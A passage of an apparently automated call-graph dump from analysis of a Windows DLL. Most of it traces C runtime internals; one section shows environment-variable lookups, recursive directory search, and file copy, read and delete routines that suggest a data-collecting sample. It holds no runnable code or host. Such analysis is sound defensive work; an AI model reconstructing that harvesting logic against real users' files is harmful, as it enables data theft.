6057->6061 6102 23d75671 RtlEnterCriticalSection 6057->6102 6062 23d7777e 6061->6062 6064 23d77776 6061->6064 6072 23d777a9 6061->6072 6103 23d756b9 RtlLeaveCriticalSection 6061->6103 6062->6072 6104 23d77665 6062->6104 6067 23d74bc1 _abort 28 API calls 6064->6067 6067->6062 6069 23d75af6 _abort 38 API calls 6073 23d7780c 6069->6073 6071 23d77665 _abort 38 API calls 6071->6072 6107 23d7782e 6072->6107 6074 23d75af6 _abort 38 API calls 6073->6074 6073->6075 6074->6075 6111 23d7bdc9 6075->6111 6077 23d760fe ___scrt_fastfail 6076->6077 6078 23d7612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6077->6078 6079 23d761fb ___scrt_fastfail 6078->6079 6080 23d72ada _ValidateLocalCookies 5 API calls 6079->6080 6081 23d76219 6080->6081 6081->6045 6130 23d7499b 6082->6130 6088 23d77527 6085->6088 6087 23d755ad 6087->6038 6087->6049 6089 23d77533 ___scrt_is_nonwritable_in_current_image 6088->6089 6094 23d75671 RtlEnterCriticalSection 6089->6094 6091 23d77541 6095 23d77575 6091->6095 6093 23d77568 _abort 6093->6087 6094->6091 6098 23d756b9 RtlLeaveCriticalSection 6095->6098 6097 23d7757f 6097->6093 6098->6097 6114 23d76231 6099->6114 6101 23d762b8 6101->6075 6102->6061 6103->6064 6105 23d75af6 _abort 38 API calls 6104->6105 6106 23d7766a 6105->6106 6106->6071 6108 23d77834 6107->6108 6109 23d777fd 6107->6109 6129 23d756b9 RtlLeaveCriticalSection 6108->6129 6109->6069 6109->6073 6109->6075 6112 23d72ada _ValidateLocalCookies 5 API calls 6111->6112 6113 23d7bdd4 6112->6113 6113->6113 6115 23d75b7a __dosmaperr 20 API calls 6114->6115 6116 23d76247 6115->6116 6117 23d762a6 6116->6117 6119 23d76255 6116->6119 6125 23d762bc IsProcessorFeaturePresent 6117->6125 6122 23d72ada _ValidateLocalCookies 5 API calls 6119->6122 6120 23d762ab 6121 23d76231 ___std_exception_copy 26 API calls 6120->6121 6123 23d762b8 6121->6123 6124 23d7627c 6122->6124 6123->6101 6124->6101 6126 23d762c7 6125->6126 6127 23d760e2 _abort 8 API calls 6126->6127 6128 23d762dc GetCurrentProcess TerminateProcess 6127->6128 6128->6120 6129->6109 6131 23d749a7 _abort 6130->6131 6132 23d749bf 6131->6132 6152 23d74af5 GetModuleHandleW 6131->6152 6161 23d75671 RtlEnterCriticalSection 6132->6161 6139 23d74a82 6172 23d74ab4 6139->6172 6140 23d74aae 6144 23d7bdc9 _abort 5 API calls 6140->6144 6141 23d749c7 6148 23d74a3c 6141->6148 6151 23d74a65 6141->6151 6162 23d7527a 6141->6162 6149 23d74ab3 6144->6149 6146 23d74669 _abort 5 API calls 6146->6151 6150 23d74a54 6148->6150 6165 23d74669 6148->6165 6150->6146 6169 23d74aa5 6151->6169 6153 23d749b3 6152->6153 6153->6132 6154 23d74b39 GetModuleHandleExW 6153->6154 6155 23d74b78 6154->6155 6156 23d74b63 GetProcAddress 6154->6156 6157 23d74b95 6155->6157 6158 23d74b8c FreeLibrary 6155->6158 6156->6155 6159 23d72ada _ValidateLocalCookies 5 API calls 6157->6159 6158->6157 6160 23d74b9f 6159->6160 6160->6132 6161->6141 6180 23d75132 6162->6180 6166 23d74698 6165->6166 6167 23d72ada _ValidateLocalCookies 5 API calls 6166->6167 6168 23d746c1 6167->6168 6168->6150 6201 23d756b9 RtlLeaveCriticalSection 6169->6201 6171 23d74a7e 6171->6139 6171->6140 6202 23d76025 6172->6202 6175 23d74ae2 6178 23d74b39 _abort 8 API calls 6175->6178 6176 23d74ac2 GetPEB 6176->6175 6177 23d74ad2 GetCurrentProcess TerminateProcess 6176->6177 6177->6175 6179 23d74aea ExitProcess 6178->6179 6183 23d750e1 6180->6183 6182 23d75156 6182->6148 6184 23d750ed ___scrt_is_nonwritable_in_current_image 6183->6184 6191 23d75671 RtlEnterCriticalSection 6184->6191 6186 23d750fb 6192 23d7515a 6186->6192 6190 23d75119 _abort 6190->6182 6191->6186 6193 23d75182 6192->6193 6194 23d7517a 6192->6194 6193->6194 6197 23d7571e _free 20 API calls 6193->6197 6195 23d72ada _ValidateLocalCookies 5 API calls 6194->6195 6196 23d75108 6195->6196 6198 23d75126 6196->6198 6197->6194 6199 23d756b9 _abort RtlLeaveCriticalSection 6198->6199 6200 23d75130 6199->6200 6200->6190 6201->6171 6203 23d7604a 6202->6203 6207 23d76040 6202->6207 6204 23d75c45 __dosmaperr 5 API calls 6203->6204 6204->6207 6205 23d72ada _ValidateLocalCookies 5 API calls 6206 23d74abe 6205->6206 6206->6175 6206->6176 6207->6205 6208->6006 6212 23d756b9 RtlLeaveCriticalSection 6209->6212 6211 23d76e16 6211->6006 6212->6211 6214 23d754c4 6213->6214 6220 23d754ba 6213->6220 6215 23d75af6 _abort 38 API calls 6214->6215 6214->6220 6216 23d754e5 6215->6216 6221 23d77a00 6216->6221 6220->6011 6220->6012 6222 23d77a13 6221->6222 6223 23d754fe 6221->6223 6222->6223 6229 23d77f0f 6222->6229 6225 23d77a2d 6223->6225 6226 23d77a55 6225->6226 6227 23d77a40 6225->6227 6226->6220 6227->6226 6228 23d76d7e __fassign 38 API calls 6227->6228 6228->6226 6230 23d77f1b ___scrt_is_nonwritable_in_current_image 6229->6230 6231 23d75af6 _abort 38 API calls 6230->6231 6232 23d77f24 6231->6232 6235 23d77f72 _abort 6232->6235 6241 23d75671 RtlEnterCriticalSection 6232->6241 6234 23d77f42 6242 23d77f86 6234->6242 6235->6223 6240 23d755a8 _abort 38 API calls 6240->6235 6241->6234 6243 23d77f94 __fassign 6242->6243 6245 23d77f56 6242->6245 6243->6245 6249 23d77cc2 6243->6249 6246 23d77f75 6245->6246 6359 23d756b9 RtlLeaveCriticalSection 6246->6359 6248 23d77f69 6248->6235 6248->6240 6251 23d77d42 6249->6251 6252 23d77cd8 6249->6252 6253 23d7571e _free 20 API calls 6251->6253 6275 23d77d90 6251->6275 6252->6251 6255 23d77d0b 6252->6255 6259 23d7571e _free 20 API calls 6252->6259 6254 23d77d64 6253->6254 6257 23d7571e _free 20 API calls 6254->6257 6256 23d77d2d 6255->6256 6264 23d7571e _free 20 API calls 6255->6264 6258 23d7571e _free 20 API calls 6256->6258 6260 23d77d77 6257->6260 6261 23d77d37 6258->6261 6263 23d77d00 6259->6263 6265 23d7571e _free 20 API calls 6260->6265 6266 23d7571e _free 20 API calls 6261->6266 6262 23d77dfe 6267 23d7571e _free 20 API calls 6262->6267 6277 23d790ba 6263->6277 6269 23d77d22 6264->6269 6270 23d77d85 6265->6270 6266->6251 6273 23d77e04 6267->6273 6305 23d791b8 6269->6305 6272 23d7571e _free 20 API calls 6270->6272 6272->6275 6273->6245 6274 23d77d9e 6274->6262 6276 23d7571e 20 API calls _free 6274->6276 6317 23d77e35 6275->6317 6276->6274 6278 23d790cb 6277->6278 6304 23d791b4 6277->6304 6279 23d790dc 6278->6279 6280 23d7571e _free 20 API calls 6278->6280 6281 23d790ee 6279->6281 6282 23d7571e _free 20 API calls 6279->6282 6280->6279 6283 23d79100 6281->6283 6284 23d7571e _free 20 API calls 6281->6284 6282->6281 6285 23d79112 6283->6285 6286 23d7571e _free 20 API calls 6283->6286 6284->6283 6287 23d79124 6285->6287 6288 23d7571e _free 20 API calls 6285->6288 6286->6285 6289 23d79136 6287->6289 6290 23d7571e _free 20 API calls 6287->6290 6288->6287 6291 23d79148 6289->6291 6292 23d7571e _free 20 API calls 6289->6292 6290->6289 6293 23d7915a 6291->6293 6294 23d7571e _free 20 API calls 6291->6294 6292->6291 6295 23d7571e _free 20 API calls 6293->6295 6297 23d7916c 6293->6297 6294->6293 6295->6297 6296 23d7917e 6299 23d79190 6296->6299 6300 23d7571e _free 20 API calls 6296->6300 6297->6296 6298 23d7571e _free 20 API calls 6297->6298 6298->6296 6301 23d791a2 6299->6301 6302 23d7571e _free 20 API calls 6299->6302 6300->6299 6303 23d7571e _free 20 API calls 6301->6303 6301->6304 6302->6301 6303->6304 6304->6255 6306 23d791c5 6305->6306 6316 23d7921d 6305->6316 6307 23d791d5 6306->6307 6308 23d7571e _free 20 API calls 6306->6308 6309 23d7571e _free 20 API calls 6307->6309 6311 23d791e7 6307->6311 6308->6307 6309->6311 6310 23d791f9 6313 23d7920b 6310->6313 6314 23d7571e _free 20 API calls 6310->6314 6311->6310 6312 23d7571e _free 20 API calls 6311->6312 6312->6310 6315 23d7571e _free 20 API calls 6313->6315 6313->6316 6314->6313 6315->6316 6316->6256 6318 23d77e60 6317->6318 6319 23d77e42 6317->6319 6318->6274 6319->6318 6323 23d7925d 6319->6323 6322 23d7571e _free 20 API calls 6322->6318 6324 23d77e5a 6323->6324 6325 23d7926e 6323->6325 6324->6322 6326 23d79221 __fassign 20 API calls 6325->6326 6327 23d79276 6326->6327 6328 23d79221 __fassign 20 API calls 6327->6328 6329 23d79281 6328->6329 6330 23d79221 __fassign 20 API calls 6329->6330 6331 23d7928c 6330->6331 6332 23d79221 __fassign 20 API calls 6331->6332 6333 23d79297 6332->6333 6334 23d79221 __fassign 20 API calls 6333->6334 6335 23d792a5 6334->6335 6336 23d7571e _free 20 API calls 6335->6336 6337 23d792b0 6336->6337 6338 23d7571e _free 20 API calls 6337->6338 6339 23d792bb 6338->6339 6340 23d7571e _free 20 API calls 6339->6340 6341 23d792c6 6340->6341 6342 23d79221 __fassign 20 API calls 6341->6342 6343 23d792d4 6342->6343 6344 23d79221 __fassign 20 API calls 6343->6344 6345 23d792e2 6344->6345 6346 23d79221 __fassign 20 API calls 6345->6346 6347 23d792f3 6346->6347 6348 23d79221 __fassign 20 API calls 6347->6348 6349 23d79301 6348->6349 6350 23d79221 __fassign 20 API calls 6349->6350 6351 23d7930f 6350->6351 6352 23d7571e _free 20 API calls 6351->6352 6353 23d7931a 6352->6353 6354 23d7571e _free 20 API calls 6353->6354 6355 23d79325 6354->6355 6356 23d7571e _free 20 API calls 6355->6356 6357 23d79330 6356->6357 6358 23d7571e _free 20 API calls 6357->6358 6358->6324 6359->6248 6361 23d76b05 6360->6361 6369 23d76baf 6360->6369 6370 23d786e4 6361->6370 6364 23d72ada _ValidateLocalCookies 5 API calls 6366 23d76c5b 6364->6366 6366->6029 6368 23d78a3e 43 API calls 6368->6369 6369->6364 6371 23d754a7 __fassign 38 API calls 6370->6371 6372 23d78704 MultiByteToWideChar 6371->6372 6374 23d78742 6372->6374 6382 23d787da 6372->6382 6376 23d756d0 21 API calls 6374->6376 6379 23d78763 ___scrt_fastfail 6374->6379 6375 23d72ada _ValidateLocalCookies 5 API calls 6377 23d76b66 6375->6377 6376->6379 6384 23d78a3e 6377->6384 6378 23d787d4 6389 23d78801 6378->6389 6379->6378 6381 23d787a8 MultiByteToWideChar 6379->6381 6381->6378 6383 23d787c4 GetStringTypeW 6381->6383 6382->6375 6383->6378 6385 23d754a7 __fassign 38 API calls 6384->6385 6386 23d78a51 6385->6386 6393 23d78821 6386->6393 6390 23d7881e 6389->6390 6391 23d7880d 6389->6391 6390->6382 6391->6390 6392 23d7571e _free 20 API calls 6391->6392 6392->6390 6394 23d7883c 6393->6394 6395 23d78862 MultiByteToWideChar 6394->6395 6396 23d7888c 6395->6396 6397 23d78a16 6395->6397 6400 23d756d0 21 API calls 6396->6400 6403 23d788ad 6396->6403 6398 23d72ada _ValidateLocalCookies 5 API calls 6397->6398 6399 23d76b87 6398->6399 6399->6368 6400->6403 6401 23d788f6 MultiByteToWideChar 6402 23d7890f 6401->6402 6416 23d78962 6401->6416 6420 23d75f19 6402->6420 6403->6401 6403->6416 6405 23d78801 __freea 20 API calls 6405->6397 6407 23d78971 6409 23d756d0 21 API calls 6407->6409 6412 23d78992 6407->6412 6408 23d78939 6410 23d75f19 11 API calls 6408->6410 6408->6416 6409->6412 6410->6416 6411 23d78a07 6414 23d78801 __freea 20 API calls 6411->6414 6412->6411 6413 23d75f19 11 API calls 6412->6413 6415 23d789e6 6413->6415 6414->6416 6415->6411 6417 23d789f5 WideCharToMultiByte 6415->6417 6416->6405 6417->6411 6418 23d78a35 6417->6418 6419 23d78801 __freea 20 API calls 6418->6419 6419->6416 6421 23d75c45 __dosmaperr 5 API calls 6420->6421 6422 23d75f40 6421->6422 6423 23d75f49 6422->6423 6428 23d75fa1 6422->6428 6426 23d72ada _ValidateLocalCookies 5 API calls 6423->6426 6427 23d75f9b 6426->6427 6427->6407 6427->6408 6427->6416 6429 23d75c45 __dosmaperr 5 API calls 6428->6429 6430 23d75fc8 6429->6430 6431 23d72ada _ValidateLocalCookies 5 API calls 6430->6431 6432 23d75f89 LCMapStringW 6431->6432 6432->6423 6434 23d76892 ___scrt_is_nonwritable_in_current_image 6433->6434 6441 23d75671 RtlEnterCriticalSection 6434->6441 6436 23d7689c 6442 23d768f1 6436->6442 6440 23d768b5 _abort 6440->6034 6441->6436 6454 23d77011 6442->6454 6444 23d7693f 6445 23d77011 26 API calls 6444->6445 6446 23d7695b 6445->6446 6447 23d77011 26 API calls 6446->6447 6448 23d76979 6447->6448 6449 23d768a9 6448->6449 6450 23d7571e _free 20 API calls 6448->6450 6451 23d768bd 6449->6451 6450->6449 6468 23d756b9 RtlLeaveCriticalSection 6451->6468 6453 23d768c7 6453->6440 6455 23d77022 6454->6455 6459 23d7701e 6454->6459 6456 23d77029 6455->6456 6461 23d7703c ___scrt_fastfail 6455->6461 6457 23d76368 _free 20 API calls 6456->6457 6458 23d7702e 6457->6458 6460 23d762ac ___std_exception_copy 26 API calls 6458->6460 6459->6444 6460->6459 6461->6459 6462 23d77073 6461->6462 6463 23d7706a 6461->6463 6462->6459 6466 23d76368 _free 20 API calls 6462->6466 6464 23d76368 _free 20 API calls 6463->6464 6465 23d7706f 6464->6465 6467 23d762ac ___std_exception_copy 26 API calls 6465->6467 6466->6465 6467->6459 6468->6453 6471 23d7545a 6469->6471 6473 23d75468 6469->6473 6470 23d76368 _free 20 API calls 6472 23d75470 6470->6472 6471->6473 6476 23d7547f 6471->6476 6474 23d762ac ___std_exception_copy 26 API calls 6472->6474 6473->6470 6475 23d7547a 6474->6475 6475->5955 6476->6475 6477 23d76368 _free 20 API calls 6476->6477 6477->6472 6479 23d7500d 6478->6479 6483 23d74fd7 6478->6483 6480 23d75024 6479->6480 6481 23d7571e _free 20 API calls 6479->6481 6482 23d7571e _free 20 API calls 6480->6482 6481->6479 6482->6483 6483->5953 6484 23d773d5 6485 23d773e1 ___scrt_is_nonwritable_in_current_image 6484->6485 6496 23d75671 RtlEnterCriticalSection 6485->6496 6487 23d773e8 6497 23d78be3 6487->6497 6489 23d773f7 6490 23d77406 6489->6490 6510 23d77269 GetStartupInfoW 6489->6510 6521 23d77422 6490->6521 6494 23d77417 _abort 6496->6487 6498 23d78bef ___scrt_is_nonwritable_in_current_image 6497->6498 6499 23d78c13 6498->6499 6500 23d78bfc 6498->6500 6524 23d75671 RtlEnterCriticalSection 6499->6524 6502 23d76368 _free 20 API calls 6500->6502 6503 23d78c01 6502->6503 6505 23d762ac ___std_exception_copy 26 API calls 6503->6505 6504 23d78c1f 6509 23d78c4b 6504->6509 6525 23d78b34 6504->6525 6506 23d78c0b _abort 6505->6506 6506->6489 6532 23d78c72 6509->6532 6511 23d77286 6510->6511 6512 23d77318 6510->6512 6511->6512 6513 23d78be3 27 API calls 6511->6513 6516 23d7731f 6512->6516 6514 23d772af 6513->6514 6514->6512 6515 23d772dd GetFileType 6514->6515 6515->6514 6517 23d77326 6516->6517 6518 23d77369 GetStdHandle 6517->6518 6519 23d773d1 6517->6519 6520 23d7737c GetFileType 6517->6520 6518->6517 6519->6490 6520->6517 6543 23d756b9 RtlLeaveCriticalSection 6521->6543 6523 23d77429 6523->6494 6524->6504 6526 23d7637b __dosmaperr 20 API calls 6525->6526 6527 23d78b46 6526->6527 6531 23d78b53 6527->6531 6535 23d75eb7 6527->6535 6528 23d7571e _free 20 API calls 6529 23d78ba5 6528->6529 6529->6504 6531->6528 6542 23d756b9 RtlLeaveCriticalSection 6532->6542 6534 23d78c79 6534->6506 6536 23d75c45 __dosmaperr 5 API calls 6535->6536 6537 23d75ede 6536->6537 6538 23d75ee7 6537->6538 6539 23d75efc InitializeCriticalSectionAndSpinCount 6537->6539 6540 23d72ada _ValidateLocalCookies 5 API calls 6538->6540 6539->6538 6541 23d75f13 6540->6541 6541->6527 6542->6534 6543->6523 6544 23d766d5 6545 23d766e1 6544->6545 6546 23d766f2 6545->6546 6547 23d766eb FindClose 6545->6547 6548 23d72ada _ValidateLocalCookies 5 API calls 6546->6548 6547->6546 6549 23d76701 6548->6549 6947 23d75351 6948 23d75360 6947->6948 6949 23d75374 6947->6949 6948->6949 6951 23d7571e _free 20 API calls 6948->6951 6950 23d7571e _free 20 API calls 6949->6950 6952 23d75386 6950->6952 6951->6949 6953 23d7571e _free 20 API calls 6952->6953 6954 23d75399 6953->6954 6955 23d7571e _free 20 API calls 6954->6955 6956 23d753aa 6955->6956 6957 23d7571e _free 20 API calls 6956->6957 6958 23d753bb 6957->6958 6550 23d736d0 6551 23d736e2 6550->6551 6553 23d736f0 @_EH4_CallFilterFunc@8 6550->6553 6552 23d72ada _ValidateLocalCookies 5 API calls 6551->6552 6552->6553 6554 23d74bdd 6555 23d74bec 6554->6555 6556 23d74c08 6554->6556 6555->6556 6557 23d74bf2 6555->6557 6558 23d76d60 51 API calls 6556->6558 6559 23d76368 _free 20 API calls 6557->6559 6560 23d74c0f GetModuleFileNameA 6558->6560 6561 23d74bf7 6559->6561 6562 23d74c33 6560->6562 6563 23d762ac ___std_exception_copy 26 API calls 6561->6563 6577 23d74d01 6562->6577 6574 23d74c01 6563->6574 6568 23d74c66 6570 23d76368 _free 20 API calls 6568->6570 6569 23d74c72 6571 23d74d01 38 API calls 6569->6571 6576 23d74c6b 6570->6576 6573 23d74c88 6571->6573 6572 23d7571e _free 20 API calls 6572->6574 6575 23d7571e _free 20 API calls 6573->6575 6573->6576 6575->6576 6576->6572 6580 23d74d26 6577->6580 6579 23d74d86 6581 23d74c50 6579->6581 6582 23d770eb 38 API calls 6579->6582 6580->6579 6589 23d770eb 6580->6589 6583 23d74e76 6581->6583 6582->6579 6584 23d74c5d 6583->6584 6585 23d74e8b 6583->6585 6584->6568 6584->6569 6585->6584 6586 23d7637b __dosmaperr 20 API calls 6585->6586 6587 23d74eb9 6586->6587 6588 23d7571e _free 20 API calls 6587->6588 6588->6584 6592 23d77092 6589->6592 6593 23d754a7 __fassign 38 API calls 6592->6593 6594 23d770a6 6593->6594 6594->6580 5689 23d71c5b 5690 23d71c6b ___scrt_fastfail 5689->5690 5693 23d712ee 5690->5693 5692 23d71c87 5694 23d71324 ___scrt_fastfail 5693->5694 5695 23d713b7 GetEnvironmentVariableW 5694->5695 5719 23d710f1 5695->5719 5698 23d710f1 57 API calls 5699 23d71465 5698->5699 5700 23d710f1 57 API calls 5699->5700 5701 23d71479 5700->5701 5702 23d710f1 57 API calls 5701->5702 5703 23d7148d 5702->5703 5704 23d710f1 57 API calls 5703->5704 5705 23d714a1 5704->5705 5706 23d710f1 57 API calls 5705->5706 5707 23d714b5 lstrlenW 5706->5707 5708 23d714d9 lstrlenW 5707->5708 5718 23d714d2 5707->5718 5709 23d710f1 57 API calls 5708->5709 5710 23d71501 lstrlenW lstrcatW 5709->5710 5711 23d710f1 57 API calls 5710->5711 5712 23d71539 lstrlenW lstrcatW 5711->5712 5713 23d710f1 57 API calls 5712->5713 5714 23d7156b lstrlenW lstrcatW 5713->5714 5715 23d710f1 57 API calls 5714->5715 5716 23d7159d lstrlenW lstrcatW 5715->5716 5717 23d710f1 57 API calls 5716->5717 5717->5718 5718->5692 5720 23d71118 ___scrt_fastfail 5719->5720 5721 23d71129 lstrlenW 5720->5721 5732 23d72c40 5721->5732 5724 23d71177 lstrlenW FindFirstFileW 5726 23d711e1 5724->5726 5727 23d711a0 5724->5727 5725 23d71168 lstrlenW 5725->5724 5726->5698 5728 23d711c7 FindNextFileW 5727->5728 5729 23d711aa 5727->5729 5728->5727 5731 23d711da FindClose 5728->5731 5729->5728 5734 23d71000 5729->5734 5731->5726 5733 23d71148 lstrcatW lstrlenW 5732->5733 5733->5724 5733->5725 5735 23d71022 ___scrt_fastfail 5734->5735 5736 23d710af 5735->5736 5737 23d7102f lstrcatW lstrlenW 5735->5737 5740 23d710b5 lstrlenW 5736->5740 5750 23d710ad 5736->5750 5738 23d7106b lstrlenW 5737->5738 5739 23d7105a lstrlenW 5737->5739 5751 23d71e89 lstrlenW 5738->5751 5739->5738 5765 23d71e16 5740->5765 5743 23d71088 GetFileAttributesW 5745 23d7109c 5743->5745 5743->5750 5744 23d710ca 5746 23d71e89 5 API calls 5744->5746 5744->5750 5745->5750 5757 23d7173a 5745->5757 5747 23d710df 5746->5747 5770 23d711ea 5747->5770 5750->5729 5752 23d72c40 ___scrt_fastfail 5751->5752 5753 23d71ea7 lstrcatW lstrlenW 5752->5753 5754 23d71ec2 5753->5754 5755 23d71ed1 lstrcatW 5753->5755 5754->5755 5756 23d71ec7 lstrlenW 5754->5756 5755->5743 5756->5755 5758 23d71747 ___scrt_fastfail 5757->5758 5785 23d71cca 5758->5785 5762 23d7199f 5762->5750 5763 23d71824 ___scrt_fastfail _strlen 5763->5762 5805 23d715da 5763->5805 5766 23d71e29 5765->5766 5769 23d71e4c 5765->5769 5767 23d71e2d lstrlenW 5766->5767 5766->5769 5768 23d71e3f lstrlenW 5767->5768 5767->5769 5768->5769 5769->5744 5771 23d7120e ___scrt_fastfail 5770->5771 5772 23d71e89 5 API calls 5771->5772 5773 23d71220 GetFileAttributesW 5772->5773 5774 23d71246 5773->5774 5775 23d71235 5773->5775 5776 23d71e89 5 API calls 5774->5776 5775->5774 5778 23d7173a 35 API calls 5775->5778 5777 23d71258 5776->5777 5779 23d710f1 56 API calls 5777->5779 5778->5774 5780 23d7126d 5779->5780 5781 23d71e89 5 API calls 5780->5781 5782 23d7127f ___scrt_fastfail 5781->5782 5783 23d710f1 56 API calls 5782->5783 5784 23d712e6 5783->5784 5784->5750 5786 23d71cf1 ___scrt_fastfail 5785->5786 5787 23d71d0f CopyFileW CreateFileW 5786->5787 5788 23d71d55 GetFileSize 5787->5788 5789 23d71d44 DeleteFileW 5787->5789 5790 23d71ede 22 API calls 5788->5790 5794 23d71808 5789->5794 5791 23d71d66 ReadFile 5790->5791 5792 23d71d94 CloseHandle DeleteFileW 5791->5792 5793 23d71d7d CloseHandle DeleteFileW 5791->5793 5792->5794 5793->5794 5794->5762 5795 23d71ede 5794->5795 5797 23d7222f 5795->5797 5798 23d7224e 5797->5798 5801 23d72250 5797->5801 5813 23d7474f 5797->5813 5818 23d747e5 5797->5818 5798->5763 5800 23d72908 5802 23d735d2 __CxxThrowException@8 RaiseException 5800->5802 5801->5800 5825 23d735d2 5801->5825 5804 23d72925 5802->5804 5804->5763 5806 23d7160c _strcat _strlen 5805->5806 5807 23d7163c lstrlenW 5806->5807 5913 23d71c9d 5807->5913 5809 23d71655 lstrcatW lstrlenW 5810 23d71678 5809->5810 5811 23d71693 ___scrt_fastfail 5810->5811 5812 23d7167e lstrcatW 5810->5812 5811->5763 5812->5811 5828 23d74793 5813->5828 5816 23d7478f 5816->5797 5817 23d74765 5834 23d72ada 5817->5834 5823 23d756d0 __dosmaperr 5818->5823 5819 23d7570e 5847 23d76368 5819->5847 5821 23d756f9 RtlAllocateHeap 5822 23d7570c 5821->5822 5821->5823 5822->5797 5823->5819 5823->5821 5824 23d7474f __dosmaperr 7 API calls 5823->5824 5824->5823 5826 23d735f2 RaiseException 5825->5826 5826->5800 5829 23d7479f ___scrt_is_nonwritable_in_current_image 5828->5829 5841 23d75671 RtlEnterCriticalSection 5829->5841 5831 23d747aa 5842 23d747dc 5831->5842 5833 23d747d1 _abort 5833->5817 5835 23d72ae5 IsProcessorFeaturePresent 5834->5835 5836 23d72ae3 5834->5836 5838 23d72b58 5835->5838 5836->5816 5846 23d72b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5838->5846 5840 23d72c3b 5840->5816 5841->5831 5845 23d756b9 RtlLeaveCriticalSection 5842->5845 5844 23d747e3 5844->5833 5845->5844 5846->5840 5850 23d75b7a GetLastError 5847->5850 5851 23d75b93 5850->5851 5852 23d75b99 5850->5852 5869 23d75e08 5851->5869 5856 23d75bf0 SetLastError 5852->5856 5876 23d7637b 5852->5876 5858 23d75bf9 5856->5858 5857 23d75bb3 5883 23d7571e 5857->5883 5858->5822 5862 23d75bb9 5864 23d75be7 SetLastError 5862->5864 5863 23d75bcf 5896 23d7593c 5863->5896 5864->5858 5867 23d7571e _free 17 API calls 5868 23d75be0 5867->5868 5868->5856 5868->5864 5901 23d75c45 5869->5901 5871 23d75e2f 5872 23d75e47 TlsGetValue 5871->5872 5873 23d75e3b 5871->5873 5872->5873 5874 23d72ada _ValidateLocalCookies 5 API calls 5873->5874 5875 23d75e58 5874->5875 5875->5852 5877 23d76388 __dosmaperr 5876->5877 5878 23d763b3 RtlAllocateHeap 5877->5878 5879 23d763c8 5877->5879 5882 23d7474f __dosmaperr 7 API calls 5877->5882 5878->5877 5880 23d75bab 5878->5880 5881 23d76368 _free 19 API calls 5879->5881 5880->5857 5889 23d75e5e 5880->5889 5881->5880 5882->5877 5884 23d75752 _free 5883->5884 5885 23d75729 HeapFree 5883->5885 5884->5862 5885->5884 5886 23d7573e 5885->5886 5887 23d76368 _free 18 API calls 5886->5887 5888 23d75744 GetLastError 5887->5888 5888->5884 5890 23d75c45 __dosmaperr 5 API calls 5889->5890 5891 23d75e85 5890->5891 5892 23d75ea0 TlsSetValue 5891->5892 5894 23d75e94 5891->5894 5892->5894 5893 23d72ada _ValidateLocalCookies 5 API calls 5895 23d75bc8 5893->5895 5894->5893 5895->5857 5895->5863 5907 23d75914 5896->5907 5903 23d75c71 5901->5903 5906 23d75c75 __crt_fast_encode_pointer 5901->5906 5902 23d75ce1 __dosmaperr LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 5902->5903 5903->5902 5905 23d75c95 5903->5905 5903->5906 5904 23d75ca1 GetProcAddress 5904->5906 5905->5904 5905->5906 5906->5871 5908 23d75854 __dosmaperr RtlEnterCriticalSection RtlLeaveCriticalSection 5907->5908 5909 23d75938 5908->5909 5910 23d758c4 5909->5910 5911 23d75758 __dosmaperr 20 API calls 5910->5911 5912 23d758e8 5911->5912 5912->5867 5914 23d71ca6 _strlen 5913->5914 5914->5809 6595 23d720db 6596 23d720e7 ___scrt_is_nonwritable_in_current_image 6595->6596 6597 23d72110 dllmain_raw 6596->6597 6599 23d720f6 6596->6599 6602 23d7210b 6596->6602 6598 23d7212a 6597->6598 6597->6599 6608 23d71eec 6598->6608 6601 23d72177 6601->6599 6603 23d71eec 31 API calls 6601->6603 6602->6599 6602->6601 6606 23d71eec 31 API calls 6602->6606 6604 23d7218a 6603->6604 6604->6599 6605 23d72193 dllmain_raw 6604->6605 6605->6599 6607 23d7216d dllmain_raw 6606->6607 6607->6601 6609 23d71ef7 6608->6609 6610 23d71f2a dllmain_crt_process_detach 6608->6610 6611 23d71f1c dllmain_crt_process_attach 6609->6611 6612 23d71efc 6609->6612 6617 23d71f06 6610->6617 6611->6617 6613 23d71f12 6612->6613 6614 23d71f01 6612->6614 6623 23d723ec 6613->6623 6614->6617 6618 23d7240b 6614->6618 6617->6602 6631 23d753e5 6618->6631 6742 23d73513 6623->6742 6628 23d72408 6628->6617 6629 23d7351e 7 API calls 6630 23d723f5 6629->6630 6630->6617 6637 23d75aca 6631->6637 6634 23d7351e 6713 23d73820 6634->6713 6636 23d72415 6636->6617 6638 23d75ad4 6637->6638 6641 23d72410 6637->6641 6639 23d75e08 __dosmaperr 11 API calls 6638->6639 6640 23d75adb 6639->6640 6640->6641 6642 23d75e5e __dosmaperr 11 API calls 6640->6642 6641->6634 6643 23d75aee 6642->6643 6645 23d759b5 6643->6645 6646 23d759c0 6645->6646 6650 23d759d0 6645->6650 6651 23d759d6 6646->6651 6649 23d7571e _free 20 API calls 6649->6650 6650->6641 6652 23d759ef 6651->6652 6653 23d759e9 6651->6653 6654 23d7571e _free 20 API calls 6652->6654 6655 23d7571e _free 20 API calls 6653->6655 6656 23d759fb 6654->6656 6655->6652 6657 23d7571e _free 20 API calls 6656->6657 6658 23d75a06 6657->6658 6659 23d7571e _free 20 API calls 6658->6659 6660 23d75a11 6659->6660 6661 23d7571e _free 20 API calls 6660->6661 6662 23d75a1c 6661->6662 6663 23d7571e _free 20 API calls 6662->6663 6664 23d75a27 6663->6664 6665 23d7571e _free 20 API calls 6664->6665 6666 23d75a32 6665->6666 6667 23d7571e _free 20 API calls 6666->6667 6668 23d75a3d 6667->6668 6669 23d7571e _free 20 API calls 6668->6669 6670 23d75a48 6669->6670 6671 23d7571e _free 20 API calls 6670->6671 6672 23d75a56 6671->6672 6677 23d7589c 6672->6677 6683 23d757a8 6677->6683 6679 23d758c0 6680 23d758ec 6679->6680 6696 23d75809 6680->6696 6682 23d75910 6682->6649 6684 23d757b4 ___scrt_is_nonwritable_in_current_image 6683->6684 6691 23d75671 RtlEnterCriticalSection 6684->6691 6686 23d757e8 6692 23d757fd 6686->6692 6688 23d757be 6688->6686 6690 23d7571e _free 20 API calls 6688->6690 6689 23d757f5 _abort 6689->6679 6690->6686 6691->6688 6695 23d756b9 RtlLeaveCriticalSection 6692->6695 6694 23d75807 6694->6689 6695->6694 6697 23d75815 ___scrt_is_nonwritable_in_current_image 6696->6697 6704 23d75671 RtlEnterCriticalSection 6697->6704 6699 23d7581f 6705 23d75a7f 6699->6705 6701 23d75832 6709 23d75848 6701->6709 6703 23d75840 _abort 6703->6682 6704->6699 6706 